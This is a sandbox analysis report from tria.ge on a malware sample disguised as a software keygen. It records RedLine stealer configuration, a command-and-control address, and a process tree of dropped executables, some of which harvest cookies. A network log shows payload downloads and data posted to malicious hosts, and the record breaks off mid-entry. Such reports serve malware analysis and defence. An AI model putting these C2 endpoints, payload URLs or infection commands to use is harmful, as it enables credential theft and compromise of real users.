Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

ﱞﱞﱞ�...ﱞﱞ

windows10_x64

10

ﱞﱞﱞ�...ฺฺ

windows10_x64

8

ﱞﱞﱞ�...ﱞﱞ

windows10_x64

10

ﱞﱞﱞ�...ﱞﱞ

windows10_x64

8

ﱞﱞﱞ�...ﱞﱞ

windows7_x64

10

win102

windows10_x64

8

win104

windows10_x64

10

win105

windows10_x64

10

win106

windows10_x64

8

win103

windows10_x64

10

win101

windows10_x64

8

win100

windows10_x64

10

Resubmissions

24/05/2021, 05:31 UTC

210524-b4dx7j71fj 10

21/05/2021, 13:30 UTC

210521-r42mg8cghe 10

Analysis

  • max time kernel
    1799s
  • max time network
    1562s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    21/05/2021, 13:30 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    keygen-step-4.exe

  • Size

    5.6MB

  • MD5

    a110ce3f7366c6bb12553ea17a793110

  • SHA1

    8e10076496347d6324382f20968f3b7c8516eedf

  • SHA256

    0e63f296fdc309cb1e487cd1a549d029d2a9144b8a050db274901030dc6ec0f3

  • SHA512

    dc9103da71a1143365f3c7f39c4a316a9b9cc6e337b601a95d13d68bba777d2145d79a9d44ac96edce71775819e4d4bb2bb0cf7e49627163237ec3580b25c3cf

Score
10/10
plugxredlineservlyla2evasioninfostealerpersistencespywarestealertrojanupxvmprotect

Malware Config

Extracted

Family

redline

Botnet

ServLyla2

C2

87.251.71.4:80

Signatures

  • PlugX

    PlugX is a RAT (Remote Access Trojan) that has been around since 2008.

    trojanplugx
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

    infostealerredline
  • RedLine Payload 2 IoCs
  • Executes dropped EXE 8 IoCs
  • UPX packed file 8 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • VMProtect packed file 3 IoCs

    Detects executables packed with VMProtect commercial packer.

    vmprotect
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
    evasiontrojan
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 1 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Modifies data under HKEY_USERS 16 IoCs
  • Modifies registry class 13 IoCs
  • Suspicious behavior: EnumeratesProcesses 11 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 63 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s Schedule
    1⤵
      PID:1084
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
      1⤵
        PID:1140
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s SENS
        1⤵
          PID:1420
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s UserManager
          1⤵
            PID:1412
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s WpnService
            1⤵
              PID:2800
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
              1⤵
              • Modifies registry class
              • Suspicious use of AdjustPrivilegeToken
              PID:2780
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s Browser
              1⤵
                PID:2696
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
                1⤵
                  PID:2536
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
                  1⤵
                    PID:2528
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
                    1⤵
                      PID:1948
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s Themes
                      1⤵
                        PID:1176
                      • c:\windows\system32\svchost.exe
                        c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                        1⤵
                          PID:1008
                        • C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe
                          "C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe"
                          1⤵
                          • Suspicious use of WriteProcessMemory
                          PID:1892
                          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe
                            "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe"
                            2⤵
                            • Executes dropped EXE
                            • Checks computer location settings
                            • Modifies registry class
                            • Suspicious use of WriteProcessMemory
                            PID:1456
                            • C:\Windows\SysWOW64\rUNdlL32.eXe
                              "C:\Windows\system32\rUNdlL32.eXe" "C:\Users\Admin\AppData\Local\Temp\install.dll",setuser
                              3⤵
                              • Loads dropped DLL
                              • Modifies registry class
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              • Suspicious use of WriteProcessMemory
                              PID:2816
                          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\ABCbrow.exe
                            "C:\Users\Admin\AppData\Local\Temp\RarSFX0\ABCbrow.exe"
                            2⤵
                            • Executes dropped EXE
                            • Suspicious use of SetThreadContext
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of WriteProcessMemory
                            PID:3992
                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                              C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                              3⤵
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4080
                          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe
                            "C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe"
                            2⤵
                            • Executes dropped EXE
                            • Checks whether UAC is enabled
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2812
                          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\gaoou.exe
                            "C:\Users\Admin\AppData\Local\Temp\RarSFX0\gaoou.exe"
                            2⤵
                            • Executes dropped EXE
                            • Adds Run key to start application
                            • Suspicious use of WriteProcessMemory
                            PID:1728
                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                              3⤵
                              • Executes dropped EXE
                              PID:1960
                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                              3⤵
                              • Executes dropped EXE
                              • Suspicious behavior: EnumeratesProcesses
                              PID:3584
                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                              3⤵
                              • Executes dropped EXE
                              • Suspicious behavior: EnumeratesProcesses
                              PID:5052
                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                              3⤵
                              • Executes dropped EXE
                              • Suspicious behavior: EnumeratesProcesses
                              PID:948
                        • \??\c:\windows\system32\svchost.exe
                          c:\windows\system32\svchost.exe -k netsvcs -s BITS
                          1⤵
                          • Suspicious use of SetThreadContext
                          • Modifies data under HKEY_USERS
                          • Modifies registry class
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          • Suspicious use of WriteProcessMemory
                          PID:752
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k SystemNetworkService
                            2⤵
                            • Drops file in System32 directory
                            • Checks processor information in registry
                            • Modifies data under HKEY_USERS
                            • Modifies registry class
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of WriteProcessMemory
                            PID:1112

                        Network

                        • flag-unknown
                          DNS
                          email.yg9.me
                          SystemNetworkService
                          Remote address:
                          8.8.8.8:53
                          Request
                          email.yg9.me
                          IN A
                          Response
                          email.yg9.me
                          IN A
                          198.13.62.186
                        • flag-unknown
                          DNS
                          email.yg9.me
                          SystemNetworkService
                          Remote address:
                          8.8.8.8:53
                          Request
                          email.yg9.me
                          IN AAAA
                          Response
                        • flag-unknown
                          DNS
                          ma.pycharm3.ru
                          ABCbrow.exe
                          Remote address:
                          8.8.8.8:53
                          Request
                          ma.pycharm3.ru
                          IN A
                          Response
                          ma.pycharm3.ru
                          IN A
                          217.107.34.191
                        • flag-unknown
                          GET
                          https://ma.pycharm3.ru/SystemRuntimeSerializationXmlFormatWriterGenerator80419
                          ABCbrow.exe
                          Remote address:
                          217.107.34.191:443
                          Request
                          GET /SystemRuntimeSerializationXmlFormatWriterGenerator80419 HTTP/1.1
                          Host: ma.pycharm3.ru
                          Connection: Keep-Alive
                          Response
                          HTTP/1.1 200 OK
                          Date: Fri, 21 May 2021 13:31:18 GMT
                          Content-Type: text/html
                          Content-Length: 211237
                          Connection: keep-alive
                          Server: Jino.ru/mod_pizza
                          Last-Modified: Wed, 19 May 2021 16:32:37 GMT
                          ETag: "87f44ac-33925-5c2b15fec3804"
                          Accept-Ranges: bytes
                        • flag-unknown
                          GET
                          http://101.36.107.74/seemorebty/il.php?e=jg6_6asg
                          jg6_6asg.exe
                          Remote address:
                          101.36.107.74:80
                          Request
                          GET /seemorebty/il.php?e=jg6_6asg HTTP/1.1
                          Connection: Keep-Alive
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image webp,image apng, q=0.8,application signed-exchange v=b3
                          Accept-Language: en-US,en;q=0.9
                          Referer: https://www.facebook.com
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit 537.36 (KHTML, like Gecko) Chrome 70.0.3538.110 Safari 537.36
                          Host: 101.36.107.74
                          Response
                          HTTP/1.1 200 OK
                          Date: Fri, 21 May 2021 13:31:19 GMT
                          Server: Apache/2.4.37 (centos)
                          X-Powered-By: PHP/7.2.24
                          Keep-Alive: timeout=5, max=100
                          Connection: Keep-Alive
                          Transfer-Encoding: chunked
                          Content-Type: text/html; charset=UTF-8
                        • flag-unknown
                          DNS
                          iplogger.org
                          gaoou.exe
                          Remote address:
                          8.8.8.8:53
                          Request
                          iplogger.org
                          IN A
                          Response
                          iplogger.org
                          IN A
                          88.99.66.31
                        • flag-unknown
                          GET
                          https://iplogger.org/ZhvS4
                          jg6_6asg.exe
                          Remote address:
                          88.99.66.31:443
                          Request
                          GET /ZhvS4 HTTP/1.1
                          Connection: Keep-Alive
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image webp,image apng, q=0.8,application signed-exchange v=b3
                          Accept-Language: en-US,en;q=0.9
                          Referer: https://www.facebook.com
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit 537.36 (KHTML, like Gecko) Chrome 70.0.3538.110 Safari 537.36
                          Host: iplogger.org
                          Response
                          HTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 21 May 2021 13:31:19 GMT
                          Content-Type: image/png
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Set-Cookie: PHPSESSID=u68jd87fg8mcnkeue5l3rgdhv2; path=/; HttpOnly
                          Pragma: no-cache
                          Set-Cookie: clhf03028ja=154.61.71.51; expires=Wed, 18-Jul-2029 05:49:51 GMT; Max-Age=257444312; path=/
                          Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
                          Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
                          Cache-Control: no-cache
                          Expires: Thu, 01 Jan 1970 00:00:01 GMT
                          Answers: 1
                          whoami: 5f6f374a2d0823068d51889a32317054977c188115fe1c6b1b8e036330756be6
                          Strict-Transport-Security: max-age=31536000; preload
                          X-Frame-Options: DENY
                        • flag-unknown
                          DNS
                          ip-api.com
                          gaoou.exe
                          Remote address:
                          8.8.8.8:53
                          Request
                          ip-api.com
                          IN A
                          Response
                          ip-api.com
                          IN A
                          208.95.112.1
                        • flag-unknown
                          GET
                          http://ip-api.com/json/?fields=8198
                          SystemNetworkService
                          Remote address:
                          208.95.112.1:80
                          Request
                          GET /json/?fields=8198 HTTP/1.1
                          Accept: */*
                          Content-Type: application/x-www-form-urlencoded
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                          Host: ip-api.com
                          Connection: Keep-Alive
                          Cache-Control: no-cache
                          Response
                          HTTP/1.1 200 OK
                          Date: Fri, 21 May 2021 13:31:25 GMT
                          Content-Type: application/json; charset=utf-8
                          Content-Length: 57
                          Access-Control-Allow-Origin: *
                          X-Ttl: 58
                          X-Rl: 38
                        • flag-unknown
                          GET
                          http://ip-api.com/json/?fields=8198
                          SystemNetworkService
                          Remote address:
                          208.95.112.1:80
                          Request
                          GET /json/?fields=8198 HTTP/1.1
                          Accept: */*
                          Content-Type: application/x-www-form-urlencoded
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                          Host: ip-api.com
                          Connection: Keep-Alive
                          Cache-Control: no-cache
                          Response
                          HTTP/1.1 200 OK
                          Date: Fri, 21 May 2021 13:31:26 GMT
                          Content-Type: application/json; charset=utf-8
                          Content-Length: 57
                          Access-Control-Allow-Origin: *
                          X-Ttl: 58
                          X-Rl: 27
                        • flag-unknown
                          GET
                          http://ip-api.com/json/?fields=8198
                          SystemNetworkService
                          Remote address:
                          208.95.112.1:80
                          Request
                          GET /json/?fields=8198 HTTP/1.1
                          Accept: */*
                          Content-Type: application/x-www-form-urlencoded
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                          Host: ip-api.com
                          Connection: Keep-Alive
                          Cache-Control: no-cache
                          Response
                          HTTP/1.1 200 OK
                          Date: Fri, 21 May 2021 13:31:26 GMT
                          Content-Type: application/json; charset=utf-8
                          Content-Length: 57
                          Access-Control-Allow-Origin: *
                          X-Ttl: 57
                          X-Rl: 21
                        • flag-unknown
                          GET
                          http://ip-api.com/json/?fields=8198
                          SystemNetworkService
                          Remote address:
                          208.95.112.1:80
                          Request
                          GET /json/?fields=8198 HTTP/1.1
                          Accept: */*
                          Content-Type: application/x-www-form-urlencoded
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                          Host: ip-api.com
                          Connection: Keep-Alive
                          Cache-Control: no-cache
                          Response
                          HTTP/1.1 200 OK
                          Date: Fri, 21 May 2021 13:31:27 GMT
                          Content-Type: application/json; charset=utf-8
                          Content-Length: 57
                          Access-Control-Allow-Origin: *
                          X-Ttl: 57
                          X-Rl: 16
                        • flag-unknown
                          GET
                          http://ip-api.com/json/
                          gaoou.exe
                          Remote address:
                          208.95.112.1:80
                          Request
                          GET /json/ HTTP/1.1
                          Connection: Keep-Alive
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                          Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
                          viewport-width: 1920
                          Host: ip-api.com
                          Response
                          HTTP/1.1 200 OK
                          Date: Fri, 21 May 2021 13:31:25 GMT
                          Content-Type: application/json; charset=utf-8
                          Content-Length: 323
                          Access-Control-Allow-Origin: *
                          X-Ttl: 58
                          X-Rl: 35
                        • flag-unknown
                          DNS
                          iw.gamegame.info
                          SystemNetworkService
                          Remote address:
                          8.8.8.8:53
                          Request
                          iw.gamegame.info
                          IN A
                          Response
                          iw.gamegame.info
                          IN A
                          104.21.21.221
                          iw.gamegame.info
                          IN A
                          172.67.200.215
                        • flag-unknown
                          POST
                          http://iw.gamegame.info/report7.4.php
                          SystemNetworkService
                          Remote address:
                          104.21.21.221:80
                          Request
                          POST /report7.4.php HTTP/1.1
                          Accept: */*
                          Content-Type: application/x-www-form-urlencoded
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                          Host: iw.gamegame.info
                          Content-Length: 278
                          Connection: Keep-Alive
                          Cache-Control: no-cache
                          Response
                          HTTP/1.1 200 OK
                          Date: Fri, 21 May 2021 13:31:26 GMT
                          Content-Type: application/json; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          CF-Cache-Status: DYNAMIC
                          cf-request-id: 0a30b8ba8300004c2cab1f1000000001
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=BeDACPmi%2Fb8YyKvpt3B367fGmlPb%2FEeknrtzYq2WXaAHquzonruW3%2FsJXF19QDqZ3yi8IVaDMvE26i1N1orARtBey6rQUghmFH5IGYA5yUTc"}],"group":"cf-nel","max_age":604800}
                          NEL: {"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 652e2a3d992b4c2c-AMS
                          alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                        • flag-unknown
                          POST
                          http://iw.gamegame.info/report7.4.php
                          SystemNetworkService
                          Remote address:
                          104.21.21.221:80
                          Request
                          POST /report7.4.php HTTP/1.1
                          Accept: */*
                          Content-Type: application/x-www-form-urlencoded
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                          Host: iw.gamegame.info
                          Content-Length: 278
                          Connection: Keep-Alive
                          Cache-Control: no-cache
                          Response
                          HTTP/1.1 200 OK
                          Date: Fri, 21 May 2021 13:31:27 GMT
                          Content-Type: application/json; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          CF-Cache-Status: DYNAMIC
                          cf-request-id: 0a30b8beb600004c2ca9bfe000000001
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=Ze0xuYoHwV6qzQWfhc%2B4Q0IBzsFTznUbQxC%2BSf7dOfSKVD9h5r97wFqWiAtKE5yGJiOUwQkE6tWTUEFmP1Z9XO52voP%2FHp1vynZwZlInmKoc"}],"group":"cf-nel","max_age":604800}
                          NEL: {"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 652e2a445c5b4c2c-AMS
                          alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                        • flag-unknown
                          POST
                          http://iw.gamegame.info/report7.4.php
                          SystemNetworkService
                          Remote address:
                          104.21.21.221:80
                          Request
                          POST /report7.4.php HTTP/1.1
                          Accept: */*
                          Content-Type: application/x-www-form-urlencoded
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                          Host: iw.gamegame.info
                          Content-Length: 250
                          Connection: Keep-Alive
                          Cache-Control: no-cache
                          Response
                          HTTP/1.1 200 OK
                          Date: Fri, 21 May 2021 13:31:27 GMT
                          Content-Type: application/json; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          CF-Cache-Status: DYNAMIC
                          cf-request-id: 0a30b8c0f100004c2c922b6000000001
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=Wx0%2Bp7f94kfoyLruq3XfP28Rn5p4NdvmcR9HmD1CZ92bo0beK%2Fw4djcJRoGBQ7%2FBqmGypUhMtJyCBbbric4DFmQ8uF1mjkLu6X1LnEO2sqpe"}],"group":"cf-nel","max_age":604800}
                          NEL: {"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 652e2a47da584c2c-AMS
                          alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                        • flag-unknown
                          POST
                          http://87.251.71.4//
                          AddInProcess32.exe
                          Remote address:
                          87.251.71.4:80
                          Request
                          POST // HTTP/1.1
                          Content-Type: text/xml; charset=utf-8
                          SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                          Host: 87.251.71.4
                          Content-Length: 137
                          Expect: 100-continue
                          Accept-Encoding: gzip, deflate
                          Connection: Keep-Alive
                        • flag-unknown
                          DNS
                          ol.gamegame.info
                          SystemNetworkService
                          Remote address:
                          8.8.8.8:53
                          Request
                          ol.gamegame.info
                          IN A
                          Response
                          ol.gamegame.info
                          IN A
                          172.67.200.215
                          ol.gamegame.info
                          IN A
                          104.21.21.221
                        • flag-unknown
                          POST
                          http://ol.gamegame.info/report7.4.php
                          SystemNetworkService
                          Remote address:
                          172.67.200.215:80
                          Request
                          POST /report7.4.php HTTP/1.1
                          Accept: */*
                          Content-Type: application/x-www-form-urlencoded
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                          Host: ol.gamegame.info
                          Content-Length: 278
                          Connection: Keep-Alive
                          Cache-Control: no-cache
                          Response
                          HTTP/1.1 200 OK
                          Date: Fri, 21 May 2021 13:31:26 GMT
                          Content-Type: application/json; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          CF-Cache-Status: DYNAMIC
                          cf-request-id: 0a30b8bcd100004c377b292000000001
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=FT57JWW3P%2FihvSmjvax3j%2FQX2n4lGKccGsXFlcNfycHxOc8YTd6V0pY0P9Agn5vmKqrieA%2BuJLiaDOFwts%2F2YvLruVtY7is4%2F5BlTgT7b5nW"}],"group":"cf-nel","max_age":604800}
                          NEL: {"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 652e2a414ef64c37-AMS
                          alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                        • flag-unknown
                          DNS
                          www.facebook.com
                          gaoou.exe
                          Remote address:
                          8.8.8.8:53
                          Request
                          www.facebook.com
                          IN A
                          Response
                          www.facebook.com
                          IN CNAME
                          star-mini.c10r.facebook.com
                          star-mini.c10r.facebook.com
                          IN A
                          157.240.210.35
                        • flag-unknown
                          GET
                          https://www.facebook.com/
                          gaoou.exe
                          Remote address:
                          157.240.210.35:443
                          Request
                          GET / HTTP/1.1
                          Connection: Keep-Alive
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                          Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
                          viewport-width: 1920
                          Sec-Fetch-Dest: document
                          Sec-Fetch-Mode: navigate
                          Sec-Fetch-Site: none
                          Sec-Fetch-User: ?1
                          Upgrade-Insecure-Requests: 1
                          Host: www.facebook.com
                          Response
                          HTTP/1.1 200 OK
                          content-security-policy: default-src facebook.com *.facebook.com fbcdn.net *.fbcdn.net fbsbx.com *.fbsbx.com cdninstagram.com *.cdninstagram.com data: blob: 'self';script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src data: blob: 'unsafe-inline' facebook.com *.facebook.com fbcdn.net *.fbcdn.net fbsbx.com *.fbsbx.com cdninstagram.com *.cdninstagram.com;connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* attachment.fbsbx.com blob: *.cdninstagram.com 'self';block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c;
                          Cache-Control: private, no-cache, no-store, must-revalidate
                          X-Frame-Options: DENY
                          X-XSS-Protection: 0
                          Strict-Transport-Security: max-age=15552000; preload
                          X-Content-Type-Options: nosniff
                          Expires: Sat, 01 Jan 2000 00:00:00 GMT
                          Vary: Accept-Encoding
                          Pragma: no-cache
                          x-fb-rlafr: 0
                          Content-Type: text/html; charset="utf-8"
                          X-FB-Debug: JhFb3bXFfEbxkRaisg7cgAzcxkXoUS4DEd5ct5CZ18ybjN5fDsDKDclNbAuf5DUGvHjyHLeFpEdd9x1i1cIRoA==
                          Date: Fri, 21 May 2021 13:31:27 GMT
                          Priority: u=3,i
                          Transfer-Encoding: chunked
                          Alt-Svc: h3-29=":443"; ma=3600,h3-27=":443"; ma=3600
                          Connection: keep-alive
                        • flag-unknown
                          GET
                          https://www.facebook.com/
                          gaoou.exe
                          Remote address:
                          157.240.210.35:443
                          Request
                          GET / HTTP/1.1
                          Connection: Keep-Alive
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                          Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
                          viewport-width: 1920
                          Sec-Fetch-Dest: document
                          Sec-Fetch-Mode: navigate
                          Sec-Fetch-Site: none
                          Sec-Fetch-User: ?1
                          Upgrade-Insecure-Requests: 1
                          Host: www.facebook.com
                          Response
                          HTTP/1.1 200 OK
                          content-security-policy: default-src facebook.com *.facebook.com fbcdn.net *.fbcdn.net fbsbx.com *.fbsbx.com cdninstagram.com *.cdninstagram.com data: blob: 'self';script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src data: blob: 'unsafe-inline' facebook.com *.facebook.com fbcdn.net *.fbcdn.net fbsbx.com *.fbsbx.com cdninstagram.com *.cdninstagram.com;connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* attachment.fbsbx.com blob: *.cdninstagram.com 'self';block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c;
                          Cache-Control: private, no-cache, no-store, must-revalidate
                          X-Frame-Options: DENY
                          X-XSS-Protection: 0
                          Strict-Transport-Security: max-age=15552000; preload
                          X-Content-Type-Options: nosniff
                          Expires: Sat, 01 Jan 2000 00:00:00 GMT
                          Vary: Accept-Encoding
                          Pragma: no-cache
                          x-fb-rlafr: 0
                          Content-Type: text/html; charset="utf-8"
                          X-FB-Debug: b3Tr6QzIszd+2mPfqFh2m8Mg1n9Aj0cG0/4twSBiI2VyQAINQje2FG59KjxOor7GMPPlAMP3JfjhBdgRzRT5sA==
                          Date: Fri, 21 May 2021 13:31:31 GMT
                          Priority: u=3,i
                          Transfer-Encoding: chunked
                          Alt-Svc: h3-29=":443"; ma=3600,h3-27=":443"; ma=3600
                          Connection: keep-alive
                        • flag-unknown
                          DNS
                          uyyge5w3ye.2ihsfa.com
                          gaoou.exe
                          Remote address:
                          8.8.8.8:53
                          Request
                          uyyge5w3ye.2ihsfa.com
                          IN A
                          Response
                          uyyge5w3ye.2ihsfa.com
                          IN A
                          88.218.92.148
                        • flag-unknown
                          GET
                          http://uyyge5w3ye.2ihsfa.com/api/fbtime
                          gaoou.exe
                          Remote address:
                          88.218.92.148:80
                          Request
                          GET /api/fbtime HTTP/1.1
                          Connection: Keep-Alive
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
                          Host: uyyge5w3ye.2ihsfa.com
                          Response
                          HTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 21 May 2021 13:31:32 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/7.3.21
                        • flag-unknown
                          POST
